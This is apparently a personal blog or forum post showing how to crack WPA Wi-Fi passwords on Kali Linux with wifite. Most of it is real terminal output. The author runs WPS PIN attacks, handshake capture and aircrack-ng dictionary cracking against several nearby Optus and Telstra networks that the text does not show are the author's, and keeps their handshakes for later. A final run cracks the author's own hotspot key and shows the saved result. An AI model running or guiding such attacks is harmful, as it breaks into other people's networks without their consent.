Posted: 8 March 2024. At: 3:44 PM. This was 4 months ago. Post ID: 19345
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Cracking wireless networks on Kali Linux is not impossible at all.

To crack a wireless network using wifite, use it as root on Kali Linux.

This will automatically set up monitor mode and then begin the process of scanning for networks.

└─$ sudo wifite
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´
 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill
    Interface   PHY   Driver              Chipset                                                                                                                                                             
 1. wlan0       phy0  rtw_8822bu          Realtek Semiconductor Corp. 802.11ac NIC
 [+] Enabling monitor mode on wlan0... enabled!
   NUM                      ESSID   CH  ENCR    PWR    WPS  CLIENT                                                                                                                                            
   ---  -------------------------  ---  -----   ----   ---  ------
     1                 Blade A31     1  WPA-P   44db    no    1                                                                                                                                               
     2             OPTUS_D3CB28N    11  WPA-P   26db   yes                                                                                                                                                    
     3              OPTUS_D02825    11  WPA-P   24db   yes                                                                                                                                                    
     4             Telstra20E859     2  WPA-P   21db   yes                                                                                                                                                    
     5             TelstraD22F23    11  WPA-P   21db  lock                                                                                                                                                    
     6             TelstraDB031C    11  WPA-P   21db   yes                                                                                                                                                    
     7             Telstra20E859*    1  WPA-P   18db   yes                                                                                                                                                    
     8             Telstra6C5A3A    11  WPA-P   18db   yes                                                                                                                                                    
     9               WiFi-955DD6     3  WPA-P   16db    no                                                                                                                                                    
    10                       USO     6  WPA-P   15db    no                                                                                                                                                    
    11               Telstra1B31    11  WPA-P   14db   yes                                                                                                                                                    
 [+] Select target(s) (1-11) separated by commas, dashes or all:

Then, press Control-C to select a target. Type the corresponding number for the target you wish to attack. This attack was not successful, but it showed promise as I captured a handshake, which may be useful later.

 [+] (1/1) Starting attacks against 34:6B:46:D0:28:28 (OPTUS_D02825)
 [+] OPTUS_D02825 (27db) WPS Pixie-Dust: [4m55s] Failed: Reaver says "WPS pin not found"                                                                                                                      
 [+] OPTUS_D02825 (30db) WPS NULL PIN: [4m55s] Failed: Reaver process stopped (exit code: 1)                                                                                                                  
 [+] OPTUS_D02825 (29db) WPS PIN Attack: [10s PINs:2] Failed: Because access point is Locked                                                                                                                  
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: CC:3F:1D:02:BA:C7                                                                                                                      
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: E8:6F:38:5C:16:5A                                                                                                                      
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Captured handshake                                                                                                                                            
 [+] saving copy of handshake to hs/handshake_OPTUSD02825_34-6B-46-D0-28-28_2024-03-08T03-30-41.cap saved
 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (34:6b:46:d0:28:28)
 [+] aircrack: .cap file contains a valid handshake for (34:6B:46:D0:28:28)
 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 20115.9kps (current key: anchoritish)                                                                                                                          
 [!] Failed to crack handshake: wordlist-probable.txt did not contain password
 [+] Finished attacking 1 target(s), exiting

Here is another attack on a wireless network. This one was not successful either, but this shows how I can easily capture a handshake

 [+] (1/1) Starting attacks against D6:35:1D:DB:03:24 (TelstraDB031C)
 [+] TelstraDB031C (22db) WPS Pixie-Dust: [4m57s] Failed: Reaver says "WPS pin not found"                                                                                                                     
 [+] TelstraDB031C (25db) WPS NULL PIN: [4m22s] Failed: Reaver process stopped (exit code: 1)                                                                                                                 
 [+] TelstraDB031C (23db) WPS PIN Attack: [1m4s PINs:2] Failed: Because access point is Locked                                                                                                                
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] TelstraDB031C (23db) WPA Handshake capture: Discovered new client: CA:E9:CD:03:EC:60                                                                                                                     
 [+] TelstraDB031C (22db) WPA Handshake capture: Captured handshake                                                                                                                                           
 [+] saving copy of handshake to hs/handshake_TelstraDB031C_D6-35-1D-DB-03-24_2024-03-08T03-35-28.cap saved
 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (d6:35:1d:db:03:24)
 [+] aircrack: .cap file contains a valid handshake for (D6:35:1D:DB:03:24)
 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 21097.1kps (current key: answer123)                                                                                                                            
 [!] Failed to crack handshake: wordlist-probable.txt did not contain password
 [+] Finished attacking 1 target(s), exiting

Run wifite with the –dict parameter to select a custom wordlist.

└─$ sudo wifite --dict rockyou.txt         
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´
 [+] option: using wordlist rockyou.txt for cracking
 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill                                                                                                                                           
 [+] Using wlan0 already in monitor mode                                                                                                                                                                      
   NUM                      ESSID   CH  ENCR    PWR    WPS  CLIENT                                                                                                                                            
   ---  -------------------------  ---  -----   ----   ---  ------
     1                 Blade A31     1  WPA-P   31db    no    1                                                                                                                                               
     2             Telstra20E859     2  WPA-P   23db   yes    1                                                                                                                                               
     3             OPTUS_D3CB28N    11  WPA-P   22db   yes                                                                                                                                                    
     4             TelstraDB031C    11  WPA-P   22db   yes    1                                                                                                                                               
     5              OPTUS_D02825*   11  WPA-P   21db   yes                                                                                                                                                    
     6             TelstraD22F23    11  WPA-P   21db  lock                                                                                                                                                    
     7                       USO     6  WPA-P   20db    no                                                                                                                                                    
     8             Telstra6C5A3A    11  WPA-P   20db   yes                                                                                                                                                    
     9             Telstra20E859     1  WPA-P   18db   yes                                                                                                                                                    
    10               Telstra1B31    11  WPA-P   16db   yes                                                                                                                                                    
 [+] Select target(s) (1-10) separated by commas, dashes or all: 7

This can help, but you need to be lucky to find a valid password with such a small wordlist. If it was 2 terabytes you would have more luck. But these instructions should help you on the right track to cracking Wi-Fi with Kali Linux.

└─$ sudo wifite --dict rockyou.txt
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´
 [+] option: using wordlist rockyou.txt for cracking
 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill                                                                                                                                           
 [+] Using wlan0 already in monitor mode                                                                                                                                                                      
   NUM                      ESSID   CH  ENCR    PWR    WPS  CLIENT                                                                                                                                            
   ---  -------------------------  ---  -----   ----   ---  ------
     1                 Blade A31     1  WPA-P   33db    no    1                                                                                                                                               
     2              OPTUS_D02825    11  WPA-P   27db   yes                                                                                                                                                    
     3             Telstra20E859     1  WPA-P   24db   yes                                                                                                                                                    
     4             OPTUS_D3CB28N    11  WPA-P   24db   yes                                                                                                                                                    
     5             Telstra20E859     2  WPA-P   21db   yes                                                                                                                                                    
     6                       USO     6  WPA-P   21db    no                                                                                                                                                    
     7             Telstra6C5A3A    11  WPA-P   19db   yes                                                                                                                                                    
     8             TelstraD22F23    11  WPA-P   19db  lock                                                                                                                                                    
     9             TelstraDB031C    11  WPA-P   19db   yes    1                                                                                                                                               
 [+] Select target(s) (1-9) separated by commas, dashes or all: 1                                                                                                                                             
 [+] (1/1) Starting attacks against BA:E5:CD:AF:70:8C (Blade A31)
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] Blade A31 (32db) WPA Handshake capture: Discovered new client: 66:0D:3C:B1:5C:1B                                                                                                                         
 [+] Blade A31 (31db) WPA Handshake capture: Captured handshake                                                                                                                                               
 [+] saving copy of handshake to hs/handshake_BladeA31_BA-E5-CD-AF-70-8C_2024-03-08T03-43-34.cap saved
 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (ba:e5:cd:af:70:8c)
 [+] aircrack: .cap file contains a valid handshake for (BA:E5:CD:AF:70:8C)
 [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist
 [!] Failed to crack handshake: rockyou.txt did not contain password
 [+] Finished attacking 1 target(s), exiting

Install this tool to have more advanced functionality for wifite.

└─$ sudo apt install hcxdumptool hcxtools

I did create a network myself on my phone and then I connected to it. This allowed me to capture the handshake and then the password was in the wordlist. This is what a sucessful capture looks like.

└─$ sudo wifite --dict rockyou.txt
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´
 [+] option: using wordlist rockyou.txt for cracking
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill                                                                                                                                                                                                                         
 [+] Using wlan0 already in monitor mode                                                                                                                                                                                                                                                    
   NUM                      ESSID   CH  ENCR    PWR    WPS  CLIENT                                                                                                                                                                                                                          
   ---  -------------------------  ---  -----   ----   ---  ------
     1  354535343434576437974...     6  WPA-P   60db    no                                                                                                                                                                                                                                  
     2                 Blade A31     1  WPA-P   30db    no    1                                                                                                                                                                                                                             
     3             OPTUS_D3CB28N    11  WPA-P   26db   yes                                                                                                                                                                                                                                  
     4             Telstra20E859     1  WPA-P   25db   yes                                                                                                                                                                                                                                  
     5             Telstra20E859*    2  WPA-P   21db   yes                                                                                                                                                                                                                                  
     6             TelstraDB031C    11  WPA-P   20db   yes    1                                                                                                                                                                                                                             
     7             TelstraD22F23    11  WPA-P   19db  lock                                                                                                                                                                                                                                  
     8                       USO     7  WPA-P   18db    no                                                                                                                                                                                                                                  
     9             Telstra6C5A3A    11  WPA-P   17db   yes                                                                                                                                                                                                                                  
    10               WiFi-955DD6     3  WPA-P   16db    no                                                                                                                                                                                                                                  
    11              OPTUS_D02825    11  WPA-P   15db   yes                                                                                                                                                                                                                                  
 [+] Select target(s) (1-11) separated by commas, dashes or all: 1                                                                                                                                                                                                                          
 [+] (1/1) Starting attacks against 6E:85:E1:CF:4C:39 (354535343434576437974355444)
 [+] 354535343434576437974355444 (60db) PMKID CAPTURE: Failed to capture PMKID   
 [+] 354535343434576437974355444 (57db) WPA Handshake capture: Captured handshake                                                                                                                                                                                                           
 [+] saving copy of handshake to hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap saved
 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (6e:85:e1:cf:4c:39)
 [+] aircrack: .cap file contains a valid handshake for (6E:85:E1:CF:4C:39)
 [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist
 [+] Cracking WPA Handshake: 0.02% ETA: 8m38s @ 19856.3kps (current key: password3)                                                                                                                                                                                                         
 [+] Cracked WPA Handshake PSK: password3
 [+]   Access Point Name: 354535343434576437974355444
 [+]  Access Point BSSID: 6E:85:E1:CF:4C:39
 [+]          Encryption: WPA
 [+]      Handshake File: hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap
 [+]      PSK (password): password3
 [+] saved crack result to cracked.json (1 total)
 [+] Finished attacking 1 target(s), exiting

This is the cracked.json file.

    "type": "WPA",
    "date": 1709871435,
    "essid": "354535343434576437974355444",
    "bssid": "6E:85:E1:CF:4C:39",
    "key": "password3",
    "handshake_file": "hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap"

This has all the information I need.

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